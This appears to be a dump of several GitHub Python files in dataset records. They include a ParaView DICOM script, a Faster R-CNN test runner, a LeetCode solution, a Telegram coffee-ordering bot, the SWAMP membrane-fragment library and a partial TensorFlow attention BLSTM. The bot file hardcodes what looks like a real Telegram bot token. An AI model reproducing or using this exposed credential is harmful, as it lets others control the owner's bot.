GetColorTransferFunction('DICOMImage')\n\n# show data in view\nthreshold1Display = Show(threshold1, renderView1)\n# trace defaults for the display properties.\nthreshold1Display.ColorArrayName = ['POINTS', 'DICOMImage']\nthreshold1Display.LookupTable = dICOMImageLUT\nthreshold1Display.OSPRayScaleArray = 'DICOMImage'\nthreshold1Display.OSPRayScaleFunction = 'PiecewiseFunction'\nthreshold1Display.SelectOrientationVectors = 'DICOMImage'\nthreshold1Display.ScaleFactor = 16.62890625\nthreshold1Display.SelectScaleArray = 'DICOMImage'\nthreshold1Display.GlyphType = 'Arrow'\nthreshold1Display.ScalarOpacityUnitDistance = 2.5428906602855523\nthreshold1Display.GaussianRadius = 8.314453125\nthreshold1Display.SetScaleArray = ['POINTS', 'DICOMImage']\nthreshold1Display.ScaleTransferFunction = 'PiecewiseFunction'\nthreshold1Display.OpacityArray = ['POINTS', 'DICOMImage']\nthreshold1Display.OpacityTransferFunction = 'PiecewiseFunction'\n\n# show color bar/color legend\nthreshold1Display.SetScalarBarVisibility(renderView1, True)\n\n# Rescale transfer function\ndICOMImageLUT.RescaleTransferFunction(-1024.0, 7622.0)\n\n# get opacity transfer function/opacity map for 'DICOMImage'\ndICOMImagePWF = GetOpacityTransferFunction('DICOMImage')\n\n# Rescale transfer function\ndICOMImagePWF.RescaleTransferFunction(-1024.0, 7622.0)\n\n# hide data in view\nHide(dICOMReaderdirectory1, renderView1)\n\n#### saving camera placements for all active views\n\n# current camera placement for renderView1\nrenderView1.CameraPosition = [157.96071299530226, 1123.585776382758, -38.74159849936598]\nrenderView1.CameraFocalPoint = [164.677734375, 164.677734375, 92.25]\nrenderView1.CameraViewUp = [-0.11784470609179896, -0.1352151618055555, -0.9837832511605568]\nrenderView1.CameraParallelScale = 250.4946604176746\n\n","repo_name":"antnieszka/DICOM-and-dose-visualization","sub_path":"scripts/pv_tresh.py","file_name":"pv_tresh.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"29414559443","text":"import anchor_target_layer\nimport read_pascal_voc\nfrom batchup import data_source\n\nrpn = []\nfeat_stride = 16\nanchor_scale = [8, 16, 32]\nimageNameFile = \"../../../Datasets/VOCdevkit/VOC2012/ImageSets/Main/aeroplane_train.txt\"\nvocPath = \"../../../Datasets/VOCdevkit/VOC2012\"\n\nImage_data, boundingBX_labels, im_dims = read_pascal_voc.prepareBatch(0, 5, imageNameFile, vocPath)\nprint(Image_data, boundingBX_labels, im_dims)\n\nepochs = 1\nfor loop in range(epochs):\n\n # ______________________________________________________________________\n # my batch creater\n # Construct an array data source\n ds = data_source.ArrayDataSource([Image_data, boundingBX_labels, im_dims])\n # Iterate over samples, drawing batches of 64 elements in random order\n for (image_input, gt_box, image_dim) in ds.batch_iterator(batch_size=1,\n shuffle=True): # shuffle true will randomise every batch\n # accuoutput=sess.run([rpn], feed_dict={input_x: image_input, gt_bbox: gt_box, im_dimsal: image_dim})\n _label, rpn_bbox_targets, rpn_bbox_inside_weights, rpn_bbox_outside_weights = anchor_target_layer.anchor_target_layer_python(\n rpn_cls_score=image_input, gt_boxes=gt_box, im_dims=image_dim, feat_strides=feat_stride,\n anchor_scales=anchor_scale)\n\n# (rpn_label)\n","repo_name":"mayanks888/AI","sub_path":"Deep 
learning/TensorFlow/object_detection_layers/modified_version/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"29375793707","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution(object):\n def isValidBST(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: bool\n \"\"\"\n\n def _valid(root):\n min_left = root.val\n if root.left:\n min_left, max_left, valid = _valid(root.left)\n if not valid or max_left >= root.val:\n return 0, 0, False\n max_right = root.val\n if root.right:\n min_right, max_right, valid = _valid(root.right)\n if not valid or root.val >= min_right:\n return 0, 0, False\n return min(min_left, root.val), max(max_right, root.val), True\n\n if root:\n _, _, valid = _valid(root)\n return valid\n return True\n\n\n","repo_name":"wangqi1996/leetcode","sub_path":"validate-binary-search-tree.py","file_name":"validate-binary-search-tree.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8537829756","text":"import json\nimport time\nimport urllib\nimport requests\nimport dborder\nimport dbmenu\nfrom datetime import datetime\n\n\ndb1 = dborder.DBOrder()\ndb2 = dbmenu.DBMenu()\n\nTOKEN = \"394797326:AAENj4pBxD86utZ4okjd_23Iy3_uQ8KeTOo\"\nURL = \"https://api.telegram.org/bot{}/\".format(TOKEN)\n\n\ndef get_url(url):\n response = requests.get(url)\n content = response.content.decode(\"utf8\")\n return content\n\n\ndef get_json_from_url(url):\n content = get_url(url)\n js = json.loads(content)\n return js\n\n\ndef get_updates(offset=None):\n url = URL + \"getUpdates?timeout=100\"\n if offset:\n url += \"&offset={}\".format(offset)\n js = get_json_from_url(url)\n return js\n\n\ndef get_last_update_id(updates):\n update_ids = []\n for update in updates[\"result\"]:\n update_ids.append(int(update[\"update_id\"]))\n return max(update_ids)\n\n\norder = []\n\n\ndef handle_updates(updates):\n for update in updates[\"result\"]:\n text = update[\"message\"][\"text\"]\n chat = update[\"message\"][\"chat\"][\"id\"]\n menu_items = db2.get_items()\n if text == \"/menu\":\n message = \"\\n\".join(menu_items)\n send_message(message, chat)\n elif text == \"/order\":\n keyboard = build_menu_keyboard(menu_items)\n send_message(\"Что вы пьете сегодня?\", chat, keyboard)\n elif text == \"/cancel\":\n db1.delete_item(text)\n send_message(\"Надеемся увидится снова!\", chat)\n\n elif text == \"/start\":\n send_message(\n \"Good MO! Мы рады, что ты зашел к нам! Если хочешь посмотерть меню, отправь /menu. \"\n \"Если уже знаешь, что хочешь заказать, отправь /order. \"\n \"Для отмены отправь /cancel.\",\n chat)\n elif text.startswith(\"/\"):\n continue\n else:\n if text in menu_items:\n message = 'Ваш заказ: ' + text\n date = datetime.now()\n order.append(text)\n order.append(date)\n send_message(message, chat)\n send_message(\"Введите свое имя и время, в которое заберете свой заказ. ФОРМАТ ЗАПИСИ: Мария 10:30\", chat)\n else:\n try:\n order.append(text)\n body = str(order[0])\n person = str(order[2])\n created = str(order[1])\n tables_id = 1\n db1.add_item(tables_id, body, person, created,)\n send_message(\"Спасибо за заказ! 
Мы очень вас ждем!\", chat)\n order.clear()\n except:\n send_message(\"Некорректно введены данные, повторите ввод\", chat)\n\n\ndef get_last_chat_id_and_text(updates):\n num_updates = len(updates[\"result\"])\n last_update = num_updates - 1\n text = updates[\"result\"][last_update][\"message\"][\"text\"]\n chat_id = updates[\"result\"][last_update][\"message\"][\"chat\"][\"id\"]\n return (text, chat_id)\n\n\ndef build_menu_keyboard(menu_items):\n menu_keyboard = [[item] for item in menu_items]\n reply_markup = {\"keyboard\": menu_keyboard, \"one_time_keyboard\": True}\n return json.dumps(reply_markup)\n\n\ndef build_keyboard(items):\n keyboard = [[item] for item in items]\n reply_markup = {\"keyboard\": keyboard, \"one_time_keyboard\": True}\n return json.dumps(reply_markup)\n\n\ndef send_message(text, chat_id, reply_markup=None):\n text = urllib.parse.quote_plus(text)\n url = URL + \"sendMessage?text={}&chat_id={}&parse_mode=Markdown\".format(text, chat_id)\n if reply_markup:\n url += \"&reply_markup={}\".format(reply_markup)\n get_url(url)\n\n\ndef main():\n # db1.setup()\n last_update_id = None\n while True:\n updates = get_updates(last_update_id)\n if len(updates[\"result\"]) > 0:\n last_update_id = get_last_update_id(updates) + 1\n handle_updates(updates)\n time.sleep(0.5)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"savinkova-mariia/coffee_bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4218,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33900067115","text":"import os\nimport gemmi\nimport conkit.io\nimport itertools\nimport pandas as pd\nimport swamp.utils as utils\nfrom swamp.wrappers import Gesamt\nfrom swamp.parsers import PdbtmXmlParser\nfrom swamp.logger import SwampLogger\n\n\nclass SwampLibrary(object):\n \"\"\"Class that implements certain methods to create a SWAMP fragment library and data structures to manage the data\n of interest in the library.\n\n :param str workdir: the working directory for this instance. Only used if a library will be created.\n :param `~swamp.logger.swamplogger.SwampLogger` logger: logging instance\n :ivar `pandas.DataFrame` rmsd_matrix: square dataframe with the rmsd distance across framgents in the library\n :ivar `pandas.DataFrame` qscore_matrix: square dataframe with the similarity across framgents in the library\n :ivar `pandas.DataFrame` nalign_matrix: square dataframe with the no. 
of aligned residues between framgents in the \\\n library\n :ivar str pdb_library: location of the directory with the pdb files contained in the SWAMP library\n :ivar str pdbtm_svn: location of the pdbtm svn repository\n :ivar str outdir: an output directory for any operation of the :py:obj:`~swamp.utils.swamplibrary.SwampLibrary` \\\n instance\n\n :example:\n\n >>> from swamp.utils.swamplibrary import SwampLibrary\n >>> my_library = SwampLibrary('<workdir>')\n >>> pdb_code_list = my_library.parse_nr_listfile(\"/path/to/nr_list\")\n >>> my_library.pdbtm_svn = \"/path/to/pdbtm_svn\"\n >>> my_library.pdb_library = \"/path.to/pdb_library\"\n >>> my_library.make_library(outdir=\"/path/to/outdir\", pdb_codes=pdb_code_list)\n >>> my_library.all_vs_all_gesamt(outdir=\"/path/to/outdir\", inputdir=\"/path/to/library\", nthreads=1)\n >>> my_library.create_distance_mtx(gesamt_dir=\"/path/to/gesamt_dir\")\n\n \"\"\"\n\n def __init__(self, workdir, logger=None):\n self.workdir = workdir\n self._make_workdir()\n if logger is None:\n self.logger = SwampLogger(__name__)\n self.logger.init(logfile=None, use_console=True, console_level='info')\n else:\n self.logger = logger\n self.qscore_matrix = None\n self.nalign_matrix = None\n self.rmsd_matrix = None\n self.pdb_library = None\n self.pdbtm_svn = None\n self.outdir = None\n\n # ------------------ Properties ------------------\n\n @property\n def pdbfiles_list(self):\n \"\"\"A list of file names in :py:attr:`~swamp.utils.swamplibrary.SwampLibrary.pdb_library`\"\"\"\n return [os.path.join(self.pdb_library, fname) for fname in os.listdir(self.pdb_library)]\n\n @property\n def _pdbfname_template(self):\n \"\"\"A template file name for pdb files\"\"\"\n return os.path.join(self.pdb_library, \"{}\", \"pdb{}.ent.gz\")\n\n @property\n def _xmlfname_template(self):\n \"\"\"A template file name for xml files\"\"\"\n return os.path.join(self.pdbtm_svn, \"{}\", \"{}.xml\")\n\n @property\n def _fragfile_template(self):\n \"\"\"A template file name for fragment pdb files\"\"\"\n return os.path.join(self.pdb_library, '{}.pdb')\n\n @property\n def _library_out_template(self):\n \"\"\"A template file name for pdb files with helical pairs\"\"\"\n return os.path.join(self.workdir, '{}_{}{}_{}{}.{}')\n\n @property\n def _ensemble_pdbout_template(self):\n \"\"\"A template pdb file name for ensemble output files\"\"\"\n if self.outdir is None:\n return None\n else:\n return os.path.join(self.outdir, 'ensemble_{}.pdb')\n\n @property\n def _centroid_template(self):\n \"\"\"A centroid pdb file name template\"\"\"\n if self.outdir is None:\n return None\n else:\n return os.path.join(self.outdir, 'centroid_{}.pdb')\n\n # ------------------ Hidden methods ------------------\n\n def _is_valid_entry(self, pdbcode):\n \"\"\"For a given pdb code, check if there is a PDB and a XML file in the \\\n :py:attr:`~swamp.utils.swamplibrary.pdb_library` and :py:attr:`~swamp.utils.swamplibrary.pdbtm_svn` respectively\n\n :param str pdbcode: the pdb code of interest\n :returns: True if all the files are present (bool)\n \"\"\"\n\n if not os.path.isfile(self._pdbfname_template.format(pdbcode[1:3], pdbcode)):\n self.logger.warning(\"Entry %s not found in input dir %s\" % (pdbcode, self.pdb_library))\n return False\n if not os.path.isfile(self._xmlfname_template.format(pdbcode[1:3], pdbcode)):\n self.logger.warning(\"Entry %s not found in input dir %s\" % (pdbcode, self.pdbtm_svn))\n return False\n return True\n\n def _make_workdir(self):\n \"\"\"Create the 
:py:attr:`~swamp.utils.swamplibrary.workdir`\n\n :raises ValueError: if :py:attr:`~swamp.utils.swamplibrary.workdir` is None\n \"\"\"\n\n if self.workdir is None:\n raise ValueError(\"Impossible to create workdir, please set workdir value first!\")\n\n if not os.path.isdir(self.workdir):\n os.mkdir(self.workdir)\n\n def _determine_orientation(self, frag_ids):\n \"\"\"For a given set of fragment ids, determine the optimal orientation to ensemble them and return the tuple of \\\n file names\n\n :param frag_ids: a list with the fragment ids of interest\n :type frag_ids: list, tuple\n :returns: a tuple with the file names of the alignment that scored the highest qscore (tuple)\n :raises ValueError: if there are less than 2 fragments in the input list\n \"\"\"\n\n if len(frag_ids) < 2:\n raise ValueError(\"Impossible to determine the orientation of less than two fragments!\")\n\n qscores = []\n frag_list = [(frag, SwampLibrary._get_reciprocal_id(frag)) for frag in frag_ids]\n\n all_combinations = list(itertools.product(*frag_list))\n\n for combination in all_combinations:\n gesamt = Gesamt(pdbin=[self._fragfile_template.format(x) for x in combination], workdir=None,\n mode=\"alignment\")\n gesamt.run()\n qscores.append(float(gesamt.summary_results[\"qscore\"]))\n\n return all_combinations[qscores.index(max(qscores))]\n\n # ------------------ Public methods ------------------\n\n def remove_homologs(self, pdb_ids_to_remove):\n \"\"\"Remove fragments originating from a set of pdb structures out of \\\n :py:attr:`~swamp.utils.swamplibrary.SwampLibrary.qscore_matrix`, \\\n :py:attr:`~swamp.utils.swamplibrary.SwampLibrary.rmsd_matrix`, \\\n :py:attr:`~swamp.utils.swamplibrary.SwampLibrary.nalign_matrix`\n\n :argument tuple pdb_ids_to_remove: tuple with the pdb codes of the structures to be removed\n \"\"\"\n\n # Detect the fragments comming from homolog structures (convert everything to lower case)\n pdb_ids_to_remove = [pdb.lower() for pdb in pdb_ids_to_remove]\n frag_ids_to_remove = []\n for frag_id in self.qscore_matrix.columns:\n if frag_id.split('_')[0].lower() in pdb_ids_to_remove:\n frag_ids_to_remove.append(frag_id)\n # Remove the fragments\n self.qscore_matrix.drop(frag_ids_to_remove, 0, inplace=True)\n self.qscore_matrix.drop(frag_ids_to_remove, 1, inplace=True)\n self.rmsd_matrix.drop(frag_ids_to_remove, 0, inplace=True)\n self.rmsd_matrix.drop(frag_ids_to_remove, 1, inplace=True)\n self.nalign_matrix.drop(frag_ids_to_remove, 0, inplace=True)\n self.nalign_matrix.drop(frag_ids_to_remove, 1, inplace=True)\n\n def create_distance_mtx(self, gesamt_dir):\n \"\"\"Create the square distance matrices for the library: \\\n :py:attr:`~swamp.utils.swamplibrary.SwampLibrary.qscore_matrix`, \\\n :py:attr:`~swamp.utils.swamplibrary.SwampLibrary.rmsd_matrix` and \\\n :py:attr:`~swamp.utils.swamplibrary.SwampLibrary.nalign_matrix`\n\n Requires the :py:func:`~swamp.utils.swamplibrary.SwampLibrary.all_vs_all_gesamt` results. 
The distance \\\n matrices contain the optimal structural alignment between every set of fragments present in the library.\n\n :param str gesamt_dir: directory containing the .hit files resulting from the all vs all gesamt search results\n \"\"\"\n\n frag_dict = self._get_frag_id_dict(gesamt_dir)\n self.qscore_matrix = pd.DataFrame()\n self.qscore_matrix[\"frag_id\"] = list(frag_dict.keys())\n self.rmsd_matrix = pd.DataFrame()\n self.rmsd_matrix[\"frag_id\"] = list(frag_dict.keys())\n self.nalign_matrix = pd.DataFrame()\n self.nalign_matrix[\"frag_id\"] = list(frag_dict.keys())\n self.logger.info(\"Creating distance matrices now...\")\n n_frags = len(frag_dict.keys())\n\n for idx, unique_id in enumerate(frag_dict.keys()):\n self.logger.info(\"Working on entry %s (%s/%s)\" % (unique_id, idx + 1, n_frags))\n fragment_distances = None\n\n for hitfile in frag_dict[unique_id]:\n # Get the current distances\n current_hits = Gesamt.parse_hitfile(hitfile)\n current_hits.drop(\"n_res\", 1, inplace=True)\n current_hits.drop(\"seq_id\", 1, inplace=True)\n current_hits.drop(\"rmsd\", 1, inplace=True)\n current_hits.fname = current_hits.fname.str.replace('.pdb', '')\n current_hits.rename(columns={\"fname\": \"frag_id\"}, inplace=True)\n current_hits.frag_id = current_hits.frag_id.apply(lambda x: self._get_unique_frag_id(x))\n current_hits[\"max_qscore\"] = current_hits.groupby([\"frag_id\"], sort=False)[\"qscore\"].transform(max)\n current_hits = current_hits[current_hits.qscore == current_hits.max_qscore]\n current_hits.drop(\"qscore\", 1, inplace=True)\n current_hits.drop_duplicates(inplace=True)\n # Append results to the current fragment distances\n fragment_distances = pd.concat([fragment_distances, current_hits]).reset_index(drop=True)\n\n # Get the final distances for this fragment\n fragment_distances.rename(columns={'max_qscore': 'qscore'}, inplace=True)\n fragment_distances['max_qscore'] = fragment_distances.groupby([\"frag_id\"], sort=False)[\"qscore\"].transform(\n max)\n fragment_distances = fragment_distances[fragment_distances.qscore == fragment_distances.max_qscore]\n fragment_distances.drop(\"max_qscore\", 1, inplace=True)\n fragment_distances.drop_duplicates(subset='frag_id', inplace=True)\n # Store it in the final matrix\n self.qscore_matrix = self.qscore_matrix.merge(fragment_distances.loc[:, ['frag_id', 'qscore']], how=\"left\",\n on=[\"frag_id\"])\n self.qscore_matrix.rename(columns={'qscore': unique_id}, inplace=True)\n self.nalign_matrix = self.nalign_matrix.merge(fragment_distances.loc[:, ['frag_id', 'n_align']], how=\"left\",\n on=[\"frag_id\"])\n self.nalign_matrix.rename(columns={'n_align': unique_id}, inplace=True)\n self.rmsd_matrix = self.rmsd_matrix.merge(fragment_distances.loc[:, ['frag_id', 'rmsd']], how=\"left\",\n on=[\"frag_id\"])\n self.rmsd_matrix.rename(columns={'rmsd': unique_id}, inplace=True)\n\n self.rmsd_matrix = self.rename_axis(self.rmsd_matrix)\n self.nalign_matrix = self.rename_axis(self.nalign_matrix)\n self.qscore_matrix = self.rename_axis(self.qscore_matrix)\n\n def make_library(self, pdb_codes):\n \"\"\"Create the pdb files for each contacting TM helical pair in detected with the information at \\\n :py:attr:`~swamp.utils.swamplibrary.pdb_library` and :py:attr:`~swamp.utils.swamplibrary.pdbtm_svn`. 
Files \\\n will be created at :py:attr:`~swamp.utils.swamplibrary.workdir`\n\n :param list pdb_codes: a list with the pdb codes that will be included to the library\n \"\"\"\n\n for idx, entry in enumerate(pdb_codes):\n\n pdbcode = entry[0]\n chain = entry[1]\n if not self._is_valid_entry(pdbcode):\n self.logger.warning(\"Skipping invalid entry %s\" % pdbcode)\n continue\n self.logger.info(\n \"Processing %s:%s entry to the library (%s / %s)\" % (pdbcode, chain, idx + 1, len(pdb_codes)))\n\n # TM helices\n pdbtm_parser = PdbtmXmlParser(self._xmlfname_template.format(pdbcode[1:3], pdbcode))\n pdbtm_parser.parse()\n tmhelices = [ss_annot for ss_annot in pdbtm_parser.ss2_annotation if\n ss_annot.type == \"H\" and ss_annot.chain == chain]\n\n # Extract pdb hierarchy\n full_hierarchy = gemmi.read_structure(self._pdbfname_template.format(pdbcode[1:3], pdbcode))\n if full_hierarchy.info.__getitem__('_exptl.method') != 'X-RAY DIFFRACTION':\n self.logger.info('Not a X-ray structure, skipping...')\n continue\n full_hierarchy.remove_waters()\n\n # Check helical pairs individually\n for idx, helix_a in enumerate(tmhelices):\n for helix_b in tmhelices[idx + 1:]:\n\n helix_a_hierarchy = utils.extract_hierarchy(to_extract=helix_a.pdb_region,\n chainID=helix_a.chain,\n full_hierarchy=full_hierarchy)\n helix_b_hierarchy = utils.extract_hierarchy(to_extract=helix_b.pdb_region,\n chainID=helix_b.chain,\n full_hierarchy=full_hierarchy)\n fragment_hierarchy = utils.merge_hierarchies((helix_a_hierarchy, helix_b_hierarchy),\n renumber=False)\n fragment_cmap = utils.extract_fragment_cmap(fragment_hierarchy,\n (helix_a.pdb_region, helix_b.pdb_region))\n\n if fragment_cmap is None:\n self.logger.warning(\n \"No contacts loaded from %s:%s %s - %s\" % (pdbcode, chain, helix_a.index, helix_b.index))\n continue\n\n if len(fragment_cmap) >= 2:\n self.logger.info(\n \"Found contacting helical pair! %s %s %s\" % (pdbcode, helix_a.index, helix_b.index))\n\n # Write pdb files\n fragment_hierarchy.cell = full_hierarchy.cell\n utils.renumber_hierarchy(fragment_hierarchy)\n inverted_fragment = utils.invert_hiearchy(fragment_hierarchy)\n inverted_fragment.cell = full_hierarchy.cell\n pdbout = self._library_out_template.format(pdbcode, helix_a.index, helix_a.chain, helix_b.index,\n helix_b.chain, \"pdb\")\n fragment_hierarchy.write_pdb(pdbout)\n pdbout = self._library_out_template.format(pdbcode, helix_b.index, helix_b.chain, helix_a.index,\n helix_a.chain, \"pdb\")\n inverted_fragment.write_pdb(pdbout)\n\n # Write contact maps\n conkit.io.write(\n self._library_out_template.format(pdbcode, helix_a.index, helix_a.chain, helix_b.index,\n helix_b.chain, \"mapalign\"), \"mapalign\", fragment_cmap)\n conkit.io.write(\n self._library_out_template.format(pdbcode, helix_a.index, helix_a.chain, helix_b.index,\n helix_b.chain, \"aleigen\"), \"aleigen\", fragment_cmap)\n inverted_cmap = utils.invert_contactmap(fragment_cmap)\n conkit.io.write(\n self._library_out_template.format(pdbcode, helix_b.index, helix_b.chain, helix_a.index,\n helix_a.chain, \"mapalign\"), \"mapalign\", inverted_cmap)\n conkit.io.write(\n self._library_out_template.format(pdbcode, helix_b.index, helix_b.chain, helix_a.index,\n helix_a.chain, \"aleigen\"), \"aleigen\", inverted_cmap)\n\n def all_vs_all_gesamt(self, inputdir, outdir, nthreads=1):\n \"\"\"For each the members of the library, obtain the distance with all the others. 
This step is required to \\\n obtain the distance matrices: :py:attr:`~swamp.utils.swamplibrary.SwampLibrary.qscore_matrix`, \\\n :py:attr:`~swamp.utils.swamplibrary.SwampLibrary.rmsd_matrix` and \\\n :py:attr:`~swamp.utils.swamplibrary.SwampLibrary.nalign_matrix`\n\n :param str inputdir: the input directory with the pdb files created by \\\n :py:func:`~swamp.utils.swamplibrary.SwampLibrary.make_library`\n :param str outdir: the output directory where the .hit files will be created\n :param int nthreads: number of threads to be used in the gesamt archive scan (default 1)\n \"\"\"\n\n # Make the archive\n self.logger.info(\"Creating gesamt archive at %s\" % os.path.join(outdir, \"gesamt_archive\"))\n gesamt_makearchive = Gesamt(workdir=None, mode=\"make-archive\", pdb_archive=inputdir, pdbin=None,\n gesamt_archive=os.path.join(outdir, \"gesamt_archive\"))\n gesamt_makearchive.run()\n\n # Scan the archive with all the fragments in the library\n self.logger.info(\"Now scanning archive with all fragments in the library...\")\n fragment_list = [os.path.join(inputdir, fname) for fname in os.listdir(inputdir) if\n fname[-4:] == \".pdb\" and os.path.isfile(os.path.join(inputdir, fname))]\n for pdbfile in fragment_list:\n id = os.path.basename(pdbfile)[:-4]\n gesamt = Gesamt(mode=\"search-archive\", pdbin=pdbfile, gesamt_archive=os.path.join(outdir, \"gesamt_archive\"),\n min2=\"0\", nthreads=str(nthreads), min1=\"0\", workdir=None,\n hits_out=os.path.join(outdir, \"%s_hits.txt\" % id))\n gesamt.run()\n\n # ------------------ Static methods ------------------\n\n @staticmethod\n def rename_axis(df):\n \"\"\"Rename the axis of a `pandas.DataFrame` so that the row names correspond with the column names\n\n :param `pandas.DataFrame` df: the dataframe to be renamed\n :returns: renamed dataframe (`pandas.DataFrame`)\n \"\"\"\n\n new_rownames = {}\n for rowidx in [x for x in list(df.index)]:\n new_rownames[rowidx] = df.columns[rowidx + 1]\n\n df = df.rename(index=new_rownames, inplace=False)\n return df.drop(\"frag_id\", 1)\n\n @staticmethod\n def _get_unique_frag_id(frag_id):\n \"\"\"For a given fragment id (pdb_tmhelix_tmhelix) obtain the unique fragment id (tmhelix fields are sorted)\n\n The unique id corresponds with the pdb code of the structure where the fragment was found, plus the sorted\n indeces of the two TM helices that form the fragment. This fragment id serves as an unique pointer for each\n component of the library.\n\n :param str frag_id: the fragment id of interest\n :returns: unique fragment id (str)\n :raises ValueError: if the fragment id has more than 3 components\n \"\"\"\n\n frag_id = frag_id.split(\"_\")\n if len(frag_id) > 3:\n raise ValueError(\"The frag ID cannot have more than 3 components! %s\" % \"_\".join(frag_id))\n frag_id[1:] = sorted(frag_id[1:])\n return \"_\".join(frag_id)\n\n @staticmethod\n def _get_reciprocal_id(frag_id):\n \"\"\"Method to get the reciprocal fragment id.\n\n A reciprocal fragment corresponds with the same fragment id, but the order at which the TM helices appear\n at the sequence the fragment has been inverted.\n\n :param str frag_id: fragment id of interest\n :returns: reciprocal id where the helical order is inverted (str)\n \"\"\"\n\n frag_id = frag_id.split(\"_\")\n if len(frag_id) > 3:\n raise ValueError(\"The frag ID cannot have more than 3 components! 
%s\" % \"_\".join(frag_id))\n frag_id[1:] = reversed(frag_id[1:])\n return \"_\".join(frag_id)\n\n @staticmethod\n def _get_frag_id_dict(gesamt_dir):\n \"\"\"In a directory full of gesamt .hit files, parse all the fragment ids and their hit files into a dictionary\n\n It will compute both orientations into a dictionary where the key is the unique frag id\n\n :param str gesamt_dir: directory where the .hit files are located\n :returns: a dictionary with the unique fragment id as key and a list with the hit filenames as values\n \"\"\"\n\n result = {}\n\n for hitfile in os.listdir(gesamt_dir):\n hitfile = os.path.join(gesamt_dir, hitfile)\n if not os.path.isfile(hitfile) or not os.path.basename(hitfile)[-4:] == \".txt\":\n continue\n frag_id = os.path.basename(hitfile)[:-9]\n unique_id = SwampLibrary._get_unique_frag_id(frag_id)\n if unique_id in result.keys():\n result[unique_id].append(hitfile)\n else:\n result[unique_id] = [hitfile]\n\n return result\n\n @staticmethod\n def parse_nr_listfile(fname):\n \"\"\"Method to parse a file with pdb structures listed as PDB:CHAIN into a nested list\n\n :param str fname: file name with the list to be parsed\n :returns: a nested list where each element contains the non-redundant pdb code and chain name (list)\n \"\"\"\n\n nr_pdbIDsChains = []\n with open(fname, \"r\") as nr_list_file:\n for line in nr_list_file:\n nr_pdbIDsChains.append((line[:4], line.rstrip()[-1]))\n return nr_pdbIDsChains\n","repo_name":"rigdenlab/SWAMP","sub_path":"swamp/utils/swamplibrary.py","file_name":"swamplibrary.py","file_ext":"py","file_size_in_byte":22275,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"15748167770","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# set random seed for consistent predict result\nfrom numpy.random import seed\nseed(2018)\nfrom tensorflow import set_random_seed\nset_random_seed(2018)\n\n\n\nimport tensorflow as tf\nfrom tensorflow.contrib.rnn import BasicLSTMCell\nfrom tensorflow.python.ops.rnn import bidirectional_dynamic_rnn as bi_rnn\n\n\n\n\nclass TAblstmConfig(object):\n \"\"\"配置参数\"\"\"\n learning_rate = 1e-3 # 学习率\n dropout_keep_prob = 0.5 # dropout保留比例\n batch_size = 20 # 每批训练大小 256\n\n embedding_dim = 300 # 词向量维度\n seq_length = 25 # 序列长度\n num_classes = 3 # 类别数 3008\n hidden_dim = 512 # 隐藏层神经元\n epsilon = 7.5\n\n vocab_size = 20000 # 词汇表达小\n voc_freq=[]\n\n num_epochs = 3 # 总迭代轮次\n\n print_per_batch = 100 # 每多少轮输出一次结果\n save_per_batch = 10 # 每多少轮存入tensorboard\n\n topk = 3 #预测前topk\n\n\ndef attention(inputs, attention_size, time_major=False, return_alphas=False):\n \"\"\"\n Attention mechanism layer which reduces RNN/Bi-RNN outputs with Attention vector.\n The idea was proposed in the article by Z. 
Yang et al., \"Hierarchical Attention Networks\n for Document Classification\", 2016: http://www.aclweb.org/anthology/N16-1174.\n Variables notation is also inherited from the article\n\n \"\"\"\n\n if isinstance(inputs, tuple):\n # In case of Bi-RNN, concatenate the forward and the backward RNN outputs.\n inputs = tf.concat(inputs, 2)\n\n if time_major:\n # (T,B,D) => (B,T,D)\n inputs = tf.array_ops.transpose(inputs, [1, 0, 2])\n\n hidden_size = inputs.shape[2].value # D value - hidden size of the RNN layer\n\n # Trainable parameters\n w_omega = tf.Variable(tf.random_normal([hidden_size, attention_size], stddev=0.1))\n b_omega = tf.Variable(tf.random_normal([attention_size], stddev=0.1))\n u_omega = tf.Variable(tf.random_normal([attention_size], stddev=0.1))\n\n with tf.name_scope('v'):\n # Applying fully connected layer with non-linear activation to each of the B*T timestamps;\n # the shape of `v` is (B,T,D)*(D,A)=(B,T,A), where A=attention_size\n v = tf.tanh(tf.tensordot(inputs, w_omega, axes=1) + b_omega)\n\n # For each of the timestamps its vector of size A from `v` is reduced with `u` vector\n vu = tf.tensordot(v, u_omega, axes=1, name='vu') # (B,T) shape\n alphas = tf.nn.softmax(vu, name='alphas') # (B,T) shape\n\n # Output of (Bi-)RNN is reduced with attention vector; the result has (B,D) shape\n output = tf.reduce_sum(inputs * tf.expand_dims(alphas, -1), 1)\n\n if not return_alphas:\n return output\n else:\n return output, alphas\n\ndef _scale_l2(x, norm_length):\n alpha = tf.reduce_max(tf.abs(x), (1, 2), keep_dims=True) + 1e-12\n l2_norm = alpha * tf.sqrt(\n tf.reduce_sum(tf.pow(x / alpha, 2), (1, 2), keep_dims=True) + 1e-6)\n x_unit = x / l2_norm\n return norm_length * x_unit\n\n\ndef add_perturbation(embedded, loss, epsilon):\n \"\"\"Adds gradient to embedding and recomputes classification loss.\"\"\"\n grad, = tf.gradients(\n loss,\n embedded,\n aggregation_method=tf.AggregationMethod.EXPERIMENTAL_ACCUMULATE_N)\n grad = tf.stop_gradient(grad)\n perturb = _scale_l2(grad, epsilon)\n return embedded + perturb\n\n\ndef normalize(emb, weights):\n print(\"Weights: \", weights)\n mean = tf.reduce_sum(weights * emb, 0, keep_dims=True)\n var = tf.reduce_sum(weights * tf.pow(emb - mean, 2.), 0, keep_dims=True)\n stddev = tf.sqrt(1e-6 + var)\n return (emb - mean) / stddev\n\n\nclass TextAblstm(object):\n 